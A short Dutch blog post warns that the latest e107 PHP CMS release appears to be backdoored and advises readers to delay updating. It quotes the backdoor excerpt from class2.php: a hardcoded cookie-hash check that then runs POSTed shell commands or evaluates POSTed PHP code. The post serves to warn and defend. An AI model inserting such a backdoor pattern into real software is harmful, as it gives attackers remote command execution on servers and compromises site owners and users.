Op Full-Disclosure meldt Bogdan Calin dat de laatste versie van het PHP CMS e107 backdoored zou zijn. Na een snelle inspectie van de source van het class2.php bestand lijkt dit inderdaad het geval te zijn (zie ook SCM Repositories – e107 voor het class2.php bestand).
Het advies: Wacht met updaten van je e107 CMS.
De kwalijke code vind je in het bestand class2.php vanaf regel 1876:
if(md5($_COOKIE['access-admin']) == “cf1afec15669cb96f09befb7d70f8bcb”) {
…
if(!empty($_POST['cmd'])){
$out = execute($_POST['cmd']);
}elseif(!empty($_POST['php'])){
ob_start();
eval($_POST['php']);
$out = ob_get_contents();
ob_end_clean();
}…
enzovoorts.
Link to this post!
Aantal keren bekeken: Please wait
